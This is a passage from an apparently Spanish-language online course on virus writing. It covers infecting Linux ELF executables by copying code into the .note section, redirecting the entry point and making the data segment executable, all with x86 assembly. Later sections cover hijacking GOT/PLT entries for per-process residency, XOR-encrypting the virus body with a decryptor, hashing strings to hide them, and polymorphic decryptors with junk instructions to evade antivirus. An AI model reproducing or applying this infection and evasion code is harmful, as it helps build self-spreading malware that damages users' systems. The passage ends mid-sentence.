es lo que suceda en Windows). Formato ELF, desde dentro La estructura fsica de este tipo de fichero es la siguiente: Cabecera ELF
Program Header Table (opcional) Seccin 1 ... Seccin N Tabla de secciones Lo primero que nos vamos a encontrar es la cabecera ELF; en ella tenemos el identificativo ELF (los 4 primeros bytes, 07fh + 'ELF'), seguido de una serie de datos acerca del fichero, que incluyen cosas como el tipo de ejecutable segn procesador, alineamiento de bytes, tipo de fichero (ejecutable, obj, etc), la mquina que corre el archivo, y toda una serie de valores descritos en la siguiente estructura: #define EI_NIDENT 16 typedef struct { unsigned char e_ident[EI_NIDENT]; Elf32_Half e_type; Elf32_Half e_machine; Elf32_Word e_version; Elf32_Addr e_entry; Elf32_Off e_phoff; Elf32_Off e_shoff; Elf32_Word e_flags; Elf32_Half e_ehsize; Elf32_Half e_phentsize; Elf32_Half e_phnum; Elf32_Half e_shentsize; Elf32_Half e_shnum; Elf32_Half e_shstrndx; } Elf32_Ehdr; Nos interesarn especialmente: -e_entry: El puntero (RVA) a inicio de ejecucin de un nuevo programa respecto a la localizacin en memoria (e_entry). Una RVA, que ya definimos en Windows, es un puntero relativo a la direccin base en que el programa se carga en memoria. Es decir, que si el programa se carga en 040000h y el Entry Point es 200h, el programa comenzar su ejecucin en 040200h. -e_phentsize, e_phnum, e_shentsize, e_shnum, e_phoff, e_shoff: Diversos campos de descripcin sobre entradas en la PHT (Program Header Table) y la SH (Section Header o Cabecera/Tabla de Secciones). La siguiente seccin a comentar es entonces la Program Header Table, que contiene las descripciones de los segmentos. Indicar en una estructura por segmento, el tipo de segmento, una direccin virtual de comienzo en memoria, tamao, permisos y algunos otros datos. Para nosotros va a ser muy necesario tocar esta tabla de entradas; por ejemplo, podemos poner a la parte de cdigo permisos de escritura, con lo que podremos tener al virus en un slo bloque sin repartirlo en secciones de cdigo y datos (lgico). En caso de que almacenemos el virus en una seccin del segmento de datos, lo que haremos ser modificar sus permisos de lectura/escritura aadiendo ejecucin para que podamos correr el virus
sobre ella. Tambin, al infectar, habr que aumentar el tamao de algn segmento, aquel en que queramos meter el virus. Por ejemplo, aumentar la de datos si nuestro virus se mete ah de forma que deje espacio para que se cargue en memoria. Una vez acabamos con esto, nos queda la tabla de secciones; cada seccin tiene una serie de datos que incluyen tipo, lugar en el fichero, RVA, tamao, etc. Lo cierto es que ni tan siquiera hace falta tocar esta tabla para infectar, excepto para saber donde comienza una seccin por ejemplo (en caso de querer hacer un cavity). El hecho de que Linux conceda prioridad a los segmentos, da muchas facilidades (aunque no sera difcil; en Windows el sistema standard de infeccin consiste en aumentar una seccin de tamao y aadirse en ella... y los ejecutables de Linux y Windows son tremendamente parecidos - el PE se deriv del COFF de Unix). Un posible algoritmo pues de infeccin sera el siguiente: -Apertura del fichero y comprobacin de si es un ELF y si es ejecutable - Buscamos en la tabla de secciones al final del fichero la .note, identificada por un campo que define el tipo en la estructura. -Comprobamos si hay espacio suficiente para el virus, y si lo hay se averigua el offset fsico donde est esta seccin y se copia ah. -Recalculamos el punto de inicio de ejecucin del fichero para que apunte a nuestro virus y guardamos el antiguo. -Aumentamos el tamao del segmento de datos para que el virus se cargue en memoria. Ejemplo de infeccin de un ELF Bien, nos ponemos fsicamente en el momento en que acabamos de mapear el fichero en memoria; la forma de infeccin que ensear, de tipo "cavity", es la que utilic al programar el Lotek. Mientras que bajo Windows vimos un tipo de infeccin en la que nos aadamos al final del programa, en esta ocasin nos vamos a colar en un hueco ya existente de l, en particular en la seccin .notes. En fin, es el tipo de infeccin que acabamos de explicar y desarrollar en cinco puntos, slo que ahora la desarrollaremos un poco ms: -Apertura del fichero y comprobacin de si es un ELF y si es ejecutable Suponemos que ya ha sido realizada la apertura del fichero y tendremos en EAX su direccin base. Comprobar estas cosas en cdigo podra ser algo como esto: cmp dword[ebx],0x464C457F ; Cadena 'ELF'+07fh jnz noesELF cmp byte [ebx + 0x10],02h ; Es ejecutable?
jnz noesELF Visto esto, ya sabremos si es un fichero que podemos infectar o no (tampoco est de ms poner la tpica marca de infeccin en algn lugar). - Buscamos en la tabla de secciones al final del fichero la .note, identificada por un campo que define el tipo en la estructura. Para esta bsqueda podemos tomar en esta ocasin un atajo (aunque tenemos el offset de la tabla de secciones y podemos iterar a travs de ellas). Nos interesa la .note, y resulta que esta entrada suele estar con muy alta probabilidad en el final del fichero menos 04Ch mov eax,[tamanyo] ; El cual habiamos averiguado antes con la funcin 13h sub eax,04Ch ; Restamos esto add eax, ; Y le aadimos la base donde se ha mapeado -Comprobamos si hay espacio suficiente para el virus, y si lo hay se averigua el offset fsico donde est esta seccin y se copia ah. Para ello hemos de tener en cuenta la estructura de la entrada de la tabla de secciones a la que acabamos de acceder: typedef struct { Elf32_Word sh_name; Elf32_Word sh_type; Elf32_Word sh_flags; Elf32_Addr sh_addr; Elf32_Off sh_offset; Elf32_Word sh_size; Elf32_Word sh_link; Elf32_Word sh_info; Elf32_Word sh_addralign; Elf32_Word sh_entsize; } Elf32_Shdr; Con esto en nuestras manos, lo que nos va a interesar pues es sh_size que indica el tamao de la seccin. Ser suficiente para alojarnos? Lo comprobamos con algo como lo siguiente: cmp word[eax+10h],tamanyo_virus jb NoHayEspacio Si tenemos suficiente espacio para alojar el virus, cogeremos ese sh_offset como una RVA y copiaremos el cdigo del virus ah, sobreescribiendo lo que se encontrase en ese lugar (que en cualquier caso, no sirve para nada y no impide el buen funcionamiento del programa): mov edi,[eax+0Ch] add edi,<direccion_base_mapeado> lea esi,[ebp+inicio_de_nuestro_virus] mov ecx,tamanyo_virus rep movsb ; Copiado! -Recalculamos el punto de inicio de ejecucin del fichero para que apunte a nuestro virus y guardamos el antiguo. Para ello, vamos a introducir la forma de otra estructura, la Program Header Table, que contiene informacin acerca de los segmentos: typedef struct { Elf32_Word p_type; Elf32_Off p_offset; Elf32_Addr p_vaddr; Elf32_Addr
p_paddr; Elf32_Word p_filesz; Elf32_Word p_memsz; Elf32_Word p_flags; Elf32_Word p_align; } Elf32_Phdr; En ella, por ejemplo p_type indica el tipo de segmento, p_offset el comienzo en fichero de este segmento, p_vaddr dnde se situar en memoria, etctera. Y son estos valores los que habremos de tener en cuenta a la hora de calcular nuestro nuevo entry point y deducir el lugar en que se hallar el antiguo. Para averiguar el nuevo entry point, cogeremos el offset sobre el que ibamos a copiar el virus sin sumarle la direccin base (es decir, el sh_offset de la tabla de secciones), le restaremos el contenido de p_offset (lo cual nos deja el desplazamiento respecto al inicio del segmento), y sumndole finalmente p_vaddr ajustaremos no respecto a la base que hemos cargado en memoria, sino al segmento cuando este sea cargado en memoria (es decir, respecto a su desplazamiento en cuanto que es direccin virtual): mov edi,[eax+0ch] ; Offset de la seccion sub eax,[ebx+098h] ; Offset seccion - offset segmento add eax,dword[ebx+09Ch] ; Desplazamiento ajustado al segmento mov dword [ebx+18h],eax ; Colocamos el nuevo entry point Como se puede ver, me estoy refiriendo a desplazamientos fijos al tocar la PHT; estoy asumiendo que 98h es p_offset, o que 9Ch es p_vaddr. Esto se debe a que ya de antemano segn esta forma de infeccin s esos desplazamientos por el sencillo motivo de que el segmento que hay que modificar siempre es el mismo, esto es, segmento de datos. Por lo tanto, tendremos tambin que hacer otra modificacin en p_flags para que nos permita ejecutar cdigo: mov byte [ebx+0ACh],7 ; PF_R+PF_W+PF_X -Aumentamos el tamao del segmento de datos para que el virus se cargue en memoria. Podemos recalcular el aumento de tamao respecto a la nueva seccin (notes) que se carga en memoria, aunque es un valor que no vamos a tener mucho problema en ajustar en lo que diramos "hardcoding", por ejemplo: mov eax,1000h add dword [ebx+0A4h],eax add dword [ebx+0A8h],eax Un detalle que hemos de tener en cuenta, es que el tamao de pgina al cargarse el ELF en memoria suele ser fijo, segn el standard //SYSTEM V// puesto a 4Kb (o potencia superior). Por supuesto, el hecho de que ejecutemos un fichero no significa que l entero vaya a ser puesto en memoria; puede que hayan partes del programa que no vayan a utilizarse, con lo que se situar la referencia en HD en la pgina, con lo que al acceder se generar un fallo de pgina y la pgina ser llevada a memoria. En resumen, que las pginas no se cargarn en memoria hasta que sean referenciadas. Por ello, tambin se encuentran las referencias a tamao virtual (en memoria) redondeadas a esta cantidad. Supongamos un fichero ELF con tres segmentos (cabecera, cdigo y datos): Con estos datos ficticios encima es sencillo ver un poco "por donde van los tiros" a la hora de utilizar el alignment (que por cierto tambin se usa en Windows). En memoria, si las
pginas son de 4Kb, slo se podrn poner permisos distintos a cada bloque de 4Kb; por tanto, el tamao de la pgina ha de determinar cmo estn alineados los segmentos. Sera absurdo tener en la misma pgina cdigo y datos, dado que ambos tienen permisos distintos. Por ello, el hecho de alinear con esta diversidad de tamaos, en fichero y en memoria, servir para mantener de forma coherente el sistema de pginas y segmentos separados. || Seccin || Offset en el fichero || Tamao en fichero (p_filesz) || Tamao en memoria || || || || || (p_memsz) || || //Cabecera // || 0 || 100h || No || || //Cdigo // || 100h || 1986h || 2000h || || //Datos // || 2086h || 987h || 1000h || Tcnicas avanzadas en Linux GOT, PLT y la posibilidad de residencia per-process Existen dos secciones, conocidas como GOT (Global Offset Table) y PLT (Procedure Linkage Table) que vamos a necesitar conocer caso de querer llevar a cabo una residencia per-process tal y como ya propusimos en Windows. La GOT, mantiene direcciones absolutas (el cdigo normal, que no ha de depender de la posicin absoluta, no debera tenerlas, para poder ser compartido por distintos procesos). El programa obtendr estos valores mediante un direccionamiento relativo, con lo cual se podrn redirigir llamadas a direccionamientos relativos a direcciones absolutas. Ojo, que estas direcciones absolutas no sern contenidas por el propio fichero (pues al compilarse no pueden saberse), sino que sern generadas por el linkador dinmico que es quien sabe de estas cosas ;) Ahora, la PLT (que va a utilizar a la GOT), va a tener como funcin la conversin de direcciones independientes de la posicin del programa a direcciones absolutas; la transferencia de control entre distintos programas que funcionan de modo independiente a su posicin es un problema que el linkador dinmico no va a poder resolver por s mismo, con lo que va a necesitar de esta tabla. Si, suena algo abstracto, transferencia de control entre objetos distintos del proceso y tal, pero, qu es sino una llamada a funciones de libc, por ejemplo? Pues llamar desde un bloque de cdigo independiente de su posicin (el programa ejecutable) a la memoria compartida en la que se halla libc (que tambin funciona independientemente de la posicin). Y la traduccin para que efectivamente pueda llamrsele, va a descansar sobre la PLT y la GOT. Cuando se crea la imagen en memoria del fichero, las posiciones de la GOT se rellenan con valores especiales, y se referenciar a esta GOT con una direccin absoluta o relativa (respecto a EBX) segn el tipo de programa. Por ejemplo, pongamos que tenemos un fichero que slo llama a una funcin; entonces, la segunda y tercera posiciones de la GOT se rellenan con unos valores especiales... y entonces, en este fichero que slo llama a una funcin, tendramos una PLT con este aspecto:
PLT0: push [EBX+4] jmp [EBX+8] nop nop PLT1: jmp dword ptr [EBX+Funcion] push $valor jmp PLTO PLT2: [...] La primera vez que llamemos a Funcin, lo que suceder es que se transmitir el control a "PLT1". Por tanto, saltar a la posicin desplazada segn el valor de "Funcin" de la GOT, que en esta ocasin (por ser la primera vez que se llama) apunta a la instruccin "push $valor" de la PLT, es decir, la siguiente instruccin al jmp indirecto que acabamos de hacer. El valor $valor que empuja a la pila es una referencia a la tabla de realocaciones, que ser del tipo R_386_JMP_SLOT (su offset indicar el nmero de entrada de la GOT a la que hace referencia). Tras empujar este offset saltamos a "PLT0", un trozo "comn" de la PLT. Ahora, se empujar a la pila el valor de la posicin [GOT+4h] (este valor es un identificativo del propio programa, para que el linkador dinmico pueda distinguir qu se ha de obtener) y se saltar a [GOT+8h], que es la direccin para llamar al propio linkador. Qu va a hacer este linkador? Pues bien, coger la direccin absoluta a la que corresponde la funcin, y la colocar en su lugar correspondiente; es decir, que en esta ocasin en lugar de //jmp dword ptr [EBX+Funcion]// se situar un salto absoluto a la direccin de la funcin correspondiente. Resumiendo los pasos de nuevo, puesto que puede resultar algo lioso de comprender: 1 ejecucin: Salta a PLT1, ejecuta un salto a la siguiente instruccin, la cual empuja un valor para ser referenciado en la tabla de realocaciones y salta a "PLT0". Una vez all, empuja el segundo valor de la GOT en la pila y salta al tercer valor, que es la direccin del linkador dinmico. Este, sustituye el valor del salto que hay nada ms caer en PLT1 por un salto absoluto sobre la funcin deseada. Luego, salta a esa direccin para llevar a cabo la funcin 2 ejecucin (y subsiguientes): Ya con el valor situado sobre el salto, la primera instruccin que antes era jmp dword ptr [EBX+Funcion] se sustituye por el salto absoluto a la funcin deseada. Ahora bien, cmo utilizar esto para nuestro provecho?. Este sistema es el utilizado por
Linux para situar las llamadas a funciones pertenecientes al propio proceso, como pueda ser la siempre interesante funcin Exec(), por ejemplo, o las de apertura de ficheros y dems... ya se os estn poniendo los cuernos de diablillos? Pues s, por ah tenemos el camino hacia la residencia "per-process", es decir, limitada al proceso que estamos ejecutando. Aqu llega, por supuesto, la inventiva individual; el mtodo ms sencillo de implementar? Bien, si el virus se ejecuta antes que ninguna otra cosa, llamar a la funcin, dejar que el linkador dinmico rellene lo que tenga que rellenar y sobreescribir con la direccin de nuestro virus... Pero bien, seguimos teniendo un problema; cmo hacemos la relacin de esto con los nombres de las funciones? Una opcin es meter mano a la Dynamic Section (lo cual no es algo muy recomendable para los dolores de cabeza). Pero por suerte, aquel $valor que se empujaba a la pila, recordamos que era una referencia a la tabla de realocaciones,... pues bien, esta entrada contiene un indice respecto a la symbol table, lo cual nos permite saber qu funcin referencia la entrada. El aspecto de una entrada de la symbol table es el siguiente: typedef struct { Elf32_Word st_name; Elf32_Addr st_value; Elf32_Word st_size; unsigned char st_info; unsigned char st_other; Elf32_Half st_shndx; } Elf32_Sym; Alguien se pregunta para qu puede servir un st_name? :-). Si a esa estructura nos da acceso una entrada en la tabla de realocaciones, tal como esta: typedef struct { Elf32_Addr r_offset; Elf32_Word r_info; } Elf32_Rel; Entonces a la cosa no le queda mucho misterio... dos punteros, nada ms, para recorrer el camino que recorre el dynamic linker a la hora de identificar la funcin respecto a su entrada en la tabla de realocaciones. Y... por ltimo, hemos de tener en cuenta a la variable de entorno LD_BIND_NOW. Si est desactivada todo ser como acabo de contar. Si no es as, las referencias en la PLT estarn ya precalculadas cuando se empiece a ejecutar el programa.
17 - Tcnicas avanzadas
Curso gratis creado por Wintermute . 22 Febrero 2006 Movistar Per Movistar 4 Mbps + Tv HD a s/. 69. Adems Antivirus y Aula 365 GRATIS www.movistar.com.pe Anuncios Google
< anterior | 1 .. 14 15 16 17 18 | siguiente >
Introduccin En este captulo se explicarn dos tcnicas aplicables a la programacin de virus informticos que pueden ser utilizadas en diversos contextos y sistemas operativos. Comenzaremos hablando sobre encriptacin bsica, para luego hablar de aquello que quiz constituye una de las partes ms personales que un escritor de programas autorreplicantes puede crear; el polimorfismo. Encriptacin Encriptacin simple Resulta un poco ridculo que, tras tener nuestro virus acabado, cualquiera pueda coger con un editor de textos, abrir el programa infectado y encontrar una cadena de texto diciendo "Virus Loquesea escrito por tal" y dems texto que hayamos includo dentro. Adems, sin un sistema siquiera mnimo de encriptacin hasta el antivirus ms estpido puede darnos una alarma con su heurstica. Por tanto, la encriptacin se convierte en algo casi necesario para nuestros pequeos autorreplicantes. El sistema ms habitual de encriptacin consiste en la utilizacin de una funcin XOR o de una combinacin ADD/SUB. La XOR, que suele ser la ms habitual, se basa en el hecho de que cuando a un nmero le aplicamos dos veces la operacin XOR con el mismo nmero, el resultado acaba siendo el mismo que al principio. Es decir, supongamos que A = 10101101 y B = 11011011. Ahora operamos: A XOR B = 10101101 XOR 11011011 = //01110110 // (A XOR B) XOR B = 01110110 XOR 11011011 = //10101101 // Este es quiz el mtodo de encriptacin ms sencillo que podemos encontrar en un virus
informtico; al hacer el XOR respecto de B se obtiene un nuevo valor que es ese byte encriptado, y de nuevo haciendo XOR con B se vuelve al original. Por lo tanto, para llevar adelante esta tcnica slo tendremos que almacenar un determinado valor (preferiblemente aleatorio) que sea este B, e iterar por todos los bytes del virus para encriptarlo. Un ejemplo en cdigo sera este: lea esi, [inicio_encriptado+ebp] mov ecx,tamanyo_encriptado call Generar_Num_Aleatorio ; supongamos que nos lo devuelve en AL mov byte ptr ds:[llave_encriptado+ebp],al Loop_Encriptacion: xor byte ptr ds:[esi],al inc esi loop Loop_Encriptacion Ahora bien, la parte del virus a ser encriptada evidentemente no puede ser su totalidad; tiene que haber un trozo que no sea encriptado, puesto que ha de haber alguna forma en que este cdigo sea desencriptado para poder ejecutarse. Realmente, slo la parte que desencripta no debe ser encriptada con lo que el resto s puede serlo. As, podramos por ejemplo copiar el virus al fichero infectado mediante memory file mapping y encriptarlo *en el fichero* pero no en la zona que estamos ejecutando nosotros. Al inicio del virus podramos dejar sin encriptar algo como esto: call Delta Delta: pop ebp sub ebp, offset Delta lea esi, [inicio_encriptado+ebp] mov ecx,tamanyo_encriptado mov al, byte ptr ds:[llave_encriptado+ebp] Loop_Desencriptacion: xor byte ptr ds:[esi],al inc esi loop Loop_Desencriptacion Con estas lineas ya podramos desencriptar en la siguiente ejecucin la totalidad del virus; todo lo que no sean estas lneas de cdigo quedaran ocultas a ojos curiosos (ojos no lo bastante curiosos como para coger un debugger y ejecutar estas lineas que lo desencriptan, claro). Por supuesto, tendris el problema de que en la primera generacin del virus (nada ms compilarlo) este no est encriptado. Nada ms sencillo para arreglar esto que inicializar "llave_encriptado" a cero. Otros sistemas sencillos de encriptacin que son variantes sobre este seran por ejemplo el uso de instrucciones de desplazamiento (ROR/ROL), de suma y resta (sumando al encriptar y restando al dividir la misma cantidad o viceversa), o el uso de un simple NOT (equivalente a XOR reg,0FFh). Y por cierto, un detalle curioso es que a pesar de su sencillez, el algoritmo XOR de encriptacin podra ser un algoritmo invencible para ocultar las comunicaciones si se cumpliesen dos condiciones; por un lado la seguridad del canal por el que se transmite la clave y por otro la posibilidad de generar nmeros verdaderamente aleatorios. Si encriptamos cada byte de los datos con un nmero distinto, y todos los nmeros que utilizamos para encriptar forman parte de una cadena totalmente aleatoria (en la prctica, la mayora de sistemas que utilizan esto se basan en un algoritmo que si no es totalmente aleatorio es al menos impredecible, basndose en valores numricos acerca de la radioactividad nuclear y su decaimiento). La explicacin es sencilla; si la informacin tiene un aspecto absolutamente aleatorio gracias a la aleatoriedad de la llave que los codifica (la cadena de nmeros), no existe ninguna forma de obtener un mensaje coherente a partir de ello excepto obteniendo la cadena de nmeros que se utiliz para encriptar...
A veces, los mejores mtodos son los ms sencillos; pero un algoritmo que realice nmeros pseudoaleatorios, tan slo dar lugar a un sistema de encriptacin pseudo-seguro. Nunca olvidemos que si hacemos un XOR entre un byte encriptado y uno desencriptado, obtenemos el nmero que ha sido utilizado para encriptar (cualesquiera dos componentes de una encriptacin XOR dan lugar al tercero). Generacin de nmeros aleatorios Gran parte del xito de un sistema de encriptacin o un engine polimrfico (de los cuales hablamos ms adelante) se basa en el hecho de que posea un buen sistema de generacin de nmeros aleatorios. Si siempre ponemos el mismo nmero a la hora de encriptar ser mucho ms fcil cazarnos, y en engines polimrficos la necesidad de una buena rutina de este estilo ya se hace absoluta. Aunque es prcticamente imposible generar nmeros realmente aleatorios - indiqu hace un par de prrafos el sistema aproximado que ms se suele usar y el lector puede ser consciente de su complejidad -, el sistema ms tpico consiste en buscar un valor realmente aleatorio que pueda usarse como semilla; es decir, que las siguientes veces que necesitemos nmeros aleatorios los sacaremos haciendo operaciones sobre este valor. La obtencin bajo un SO como Linux de esto es sencilla, puesto que por defecto la til instruccin RDTSC no tiene privilegios de supervisor en el procesador. Esta instruccin, devuelve un contador de gran precisin que puede perfctamente servir como semilla aleatoria; el problema? que existe la opcin de hacer que slo pueda ejecutarse en modo supervisor (no entiendo por qu?) y esto en Windows es as mientras que, por lo general, no sucede en Linux. Bajo Windows quiz el mejor sistema sera una llamada a la funcin de sistema GetTickCount que hace bsicamente lo mismo que RDTSC pero con una llamada a API en vez de con una instruccin (viva la optimizacin), cuya especificacin muestro a continuacin: DWORD GetTickCount(VOID) Y simplemente (jejeje sencillita de llamar eh xD) muestra el nmero de milisegundos desde que Windows se inici... un consejo no obstante, no es conveniente si tenemos que obtener varias veces seguidas nmeros aleatorios llamar contnuamente a esta funcin, en cualquiera de sus dos formas. Quiz, el contador no haya tenido tiempo de cambiar o lo haya hecho muy ligeramente, con lo que no estaramos generando un nmero precisamente muy aleatorio. Por tanto, la mejor poltica es una primera llamada para inicializar el valor de semilla aleatoria y despus operaciones sobre ese nmero que se hagan cada vez que se llama a vuestra funcin de obtener un nmero aleatorio, operaciones que tendris que disear de modo que creen una aleatoriedad realmente decente... pero esto ya es algo que entra en el desarrollo que realice cada uno...
Encriptacin Avanzada Utilizar sistemas de encriptacin ms avanzados (no parece muy difcil que sean ms complejos que un Xor pero en fin xD) tiene ventajas y desventajas. Las ventajas son claras; estamos ocultndonos de un modo ms robusto y los emuladores de los antivirus lo van a tener ms difcil para desencriptar nuestro cdigo (los detectores de virus medianamente decentes hoy en da intentan "emular" el cdigo que encuentran para que l mismo se desencripte y poder detectar con facilidad el cuerpo desencriptado del virus). La desventaja es que vamos a tener una rutina de desencriptacin mucho ms larga, lo cual si vamos a querer aplicar posteriormente tcnicas de polimorfismo es bastante ms difcil (aunque nadie ha dicho que no se puedan poner varias capas de encriptacin unas encimas de otras, la ms sencilla con el polimorfismo ms fuerte). Explicar de forma relativamente breve los sistemas de encriptacin ms importantes que pueden tener aplicacin en un sistema como este. Podramos pensar en complicarnos la vida con sistemas tipo RSA, pero lamentablemente y como es lgico, si el virus tiene la llave privada para desencriptarse, el antivirus tambin podr acceder a ella (lo cual nos sucede de nuevo como digo, lamentablemente, en cualquier sistema que utilicemos dado que la clave de desencriptado ha de estar autocontenida en el virus)... se han hecho en ocasiones aproximaciones distintas a este hecho, como el RDAE (Random Decryption Algorithm Engine) de Darkman, que prueba aleatoriamente combinaciones hasta que se desencripta intentando hacer que al antivirus no le compense trabajar tanto sin haberlo detectado (encripta con un valor aleatorio que no guarda). Aunque lamentablemente no se trata de una tcnica demasiado efectiva, es un esfuerzo interesante en este camino. Pasemos entonces a hablar de cifrado por bloques y algoritmos tipo hash: Cifrado por bloques: Los sistemas basados en cifrado por bloques pueden constituir un algoritmo de encriptacin que d quebraderos de cabeza a quien quiera eliminar el virus (estando por supuesto contenido parte del cdigo del fichero infectado dentro de la zona encriptada). Creados en los 70 por IBM, su primer resultado se llam "Lucifer", con una clave de 128 bits que coincida con el tamao del bloque (aunque ninguna de sus variantes era segura). Cada paso que se realiza sobre un bloque se denomina ronda (round), y se supone que cuanto mayor es el nmero de rondas realizadas sobre cada bloque, mayor es la seguridad... el ejemplo ms clsico de este tipo de cifrado es el sistema DES, que tiene una clave de 56 bits y acta en 16 rondas sobre bloques de 64 bits (por cierto, este algoritmo fue diseado por IBM con... ayuda de la NSA, en fin, este ltimo organismo es una constante en muchos algoritmos). A cada bloque que se cifra se le aplica una determinada funcin cierto nmero de veces (las rondas ya mencionadas); como ejemplo de implementacin de un sistema de cifrado por bloques (que aporta complejidad a la hora de desencriptar y desinfectar pero no es en absoluto infalible ya que el antivirus puede leer la llave que se utiliz para encriptar) se puede mirar mi QBCE en el virus "Win9x.Unreal". Volviendo al tema, estos sistemas son vulnerables a ataques que busquen correlaciones entre el input/output al aplicarse la funcin (criptoanlisis diferencial), respecto a la llave y
el output (criptoanlisis lineal) y en base a correlaciones en cambios en la clave y el output (criptoanlisis basado en la clave). En cualquier caso esto no nos importa mucho; el antivirus slo tiene que aplicar el mismo algoritmo que nosotros, pues conoce la llave utilizada - slo podremos hacerlo algo ms lento. Es interesante el detalle de que el criptoanlisis diferencial se invent en 1990, y todos los sistemas anteriores a esa fecha son vulnerable... todos excepto el DES, desarrollado 15 aos antes, porque ya entonces IBM y la NSA conocan esta forma de ataque (pero jams la hicieron pblica... en cualquier caso, DES es inseguro y existe hardware que lo desencripta casi instantneamente). Otro algoritmo que merece la pena mencionar dentro de esta clasificacin es el IDEA, que fue utilizado en un virus del programador Spanska. Una descripcin de ese autorreplicante debera poder encontrarse en http://www.avp.ch/avpve/file/i/idea.stm Funciones Hash: Se trata de algoritmos que llevan a cabo operaciones con una serie de datos de entrada de diversos tamaos reducindolos a un slo valor, de modo que la funcin es irreversible y su resultado virtualmente nico. Encontramos varios algoritmos que cumplen esta labor, como //MD2, MD4, MD5, SHA, HAVAL o SNEFRU//. De ellos, suele aceptarse SHA como el ms seguro (cmo no, desarrollado por la NSA). MD2 y MD4 han sido rotos, y MD5 se considera que tiene debilidades... Este sistema, por ejemplo, se utiliza con las claves almacenadas en el fichero de passwords de nuestro Linux casero; las claves de los usuarios no se almacenan, sino que lo que se guarda es el resultado de aplicar este tipo de funcin, de modo que cuando se intenta acceder a la cuenta de un usuario a la clave que se nos pregunta se le aplica el algoritmo y se compara el resultado con el almacenado (es por esto que los ataques ms tpicos cuando se obtiene este fichero de passwords se basan en codificar diccionarios con el algoritmo que se utilice en el sistema para compararlos con las entradas en el fichero de passwords; si se encuentra una coincidencia, se ha descubierto la clave). Esta aproximacin ha sido utilizada en ms de un virus para ocultar cadenas de texto a comparar con otras, de modo que se almacene tan slo el resultado de la funcin utilizada y se aplique esta funcin a las cadenas de texto/codigo/etctera con que se quiera compararlo. Por ejemplo, si queremos evitar que nuestro virus infecte determinados ejecutables pertenecientes a programas antivirus, en lugar de comparar el nombre del fichero con 'ANTIVIRUS.EXE' conteniendo esa cadena en nuestro cdigo, almacenaramos el valor resultante de aplicarle esta funcin (p.ej, supongamos que fuera "A1cHypr3F0"). As, al ir a infectar aplicaramos el algoritmo al nombre del fichero a infectar, y si el resultado fuera ese "A1cHypr3F0", no lo infectaramos. Muchos de estos algoritmos son pblicos, y se pueden encontrar referencias con explicaciones sobre su funcionamiento y cdigo para llevar a cabo su funcin (aunque probablemente estar en lenguaje C y tendris que encargaros de reprogramarlo en ensamblador). Existe tambin una forma de hacer ms complejo este algoritmo, lo que se
denomina "HMAC" (Hash Message Authentication Code), sistema por el cual el hash se realiza respecto a una clave de forma que esta afecte tanto al inicio como al final del proceso de cifrado; no obstante no hace falta esforzarse mucho en ello si estamos programando virus, ya que esta clave al estar disponible para nosotros lo estar tambin para el antivirus. Polimorfismo Introduccin al polimorfismo Hace ya unos cuantos aos, un programador blgaro que se haca llamar Dark Avenger anunci a las compaas antivirus que en breve sacara un sistema por el cual un virus podra tener millones de aspectos distintos. Se rieron de l, pero no tard mucho esa sonrisa en congelarse; hasta entonces los programas antivirus no eran ms que buscadores de cadenas hexadecimales. Si su registro de cadenas hexadecimales coincida con el de algn fichero, detectaba el virus en particular. Al fin y al cabo, aunque se encriptara el cdigo del virus, haba siempre una parte que permaneca constante... la rutina de desencriptado. El antivirus detectaba estas rutinas y las utilizaba para descifrarlo. Sin embargo, a Dark Avenger se le haba ocurrido algo que an da muchos dolores de cabeza a las compaas antivirus: el polimorfismo. Su sistema consista en hacer que la rutina de desencriptado tambin fuera compltamente variable, de modo que no pudiera ser detectada como una cadena hexadecimal. Para ilustrar en qu consiste el polimorfismo, nada mejor que usar un ejemplo de rutina de desencriptado e ir varindola. Veremos cmo, en todas sus formas, esta rutina siempre est haciendo lo mismo: mov ebp, valor_delta lea esi, [inicio_virus+ebp] mov al, byte ptr [valor] mov ecx, <tamao> descifrar: xor byte ptr [esi], al inc esi loop descifrar Cuando esto era as de forma inmutable, el antivirus no tena ms que buscar, en este caso, la cadena de bytes que resultaba del compilado de estas lneas. Sin embargo, veamos esto ahora: push valor_delta pop edi add edi, inicio_virus mov cl, byte ptr [valor] mov ebx, descifrar: xor byte ptr [edi], cl inc edi dec ebx jnz descifrar Si se observa detenidamente este cdigo, es fcil ver que est haciendo exctamente lo mismo que la rutina anterior; hemos empujado el valor precalculado del delta_offset, lo hemos sacado en edi al que aadimos "inicio_virus" (haciendo las veces de ESI en el ejemplo inicial). Adems, en vez de AL usamos CL para desencriptar; tampoco utilizamos un loop sino un dec/jnz respecto a ebx. Estamos, pues, haciendo lo mismo con un cdigo distinto. Otro ejemplo:
mov edi, (inicio_virus+valor_delta+tamao) mov bl, byte ptr [valor] mov edx, <tamao> descifrar: xor byte ptr [edi], bl dec edi dec ebx jnz descifrar Ahora, estamos desencriptando desde el final hacia el principio en lugar de como haciamos antes... y las posibilidades no acaban aqu, como es evidente; podramos hacer que a veces se utilizara el xor y otras el add/sub. Tambin podemos utilizar otros registros, idear distintas formas de cargar los parmetros en los registros correspondientes, u otras maneras en que nuestro cdigo fuera desencriptado... Sin embargo, esto no es todo lo que el polimorfismo tiene que ofrecer; esta variacin en la rutina de desencriptado es slo el primer paso. Generacin de cdigo basura En realidad, tampoco se lo estamos poniendo tan difcil como podemos an a los detectores de virus con lo que hemos visto en el apartado anterior. El siguiente paso en complejidad en el polimorfismo, es la generacin de instrucciones basura. Qu son instrucciones basura? Pues bien, se trata de cdigo que no va a hacer nada til, ms que despistar a los detectores de virus. Por ejemplo, como ejercicio bsico podramos marcar aquellos registros que no utilizasemos en nuestra rutina de desencriptado y utilizarlos para operar sobre ellos... podemos hacer lo que queramos, puesto que al ser los primeros en ejecutarnos no tenemos restricciones respecto a estos registros. Pongamos, por ejemplo, que utilizamos EAX, ECX y EDX. Esto nos deja disponibles el resto de registros para generar instrucciones como MOV EBX, o ADD ESI, ECX (con esta instruccin ESI es alterado pero ECX no!), y todo un enorme rango de operaciones que no van a suponer ningn problema ni para nosotros ni para la ejecucin de nuestro virus. Considerando esto, que constituira el polimorfismo ms clsico, ya podemos ver esta tcnica como una de las ms personales de las que puede desarrollar un escritor de programas autorreplicantes; no vamos a tener ms remedio que fabricarnos tablas de opcodes (cdigos de operacin) para generar instrucciones nosotros mismos, unido a una estrategia de variacin de las rutinas de desencriptado que intente resultar en un todo coherente y efectivo contra la deteccin de nuestro bichito. Podemos basar este cdigo en tablas, en subrutinas con saltos condicionales, o en cualquier mtodo que nos parezca ms cmodo o efectivo. Por ejemplo, podramos tener una zona "central" del engine polimrfico que se dedicara a saltar 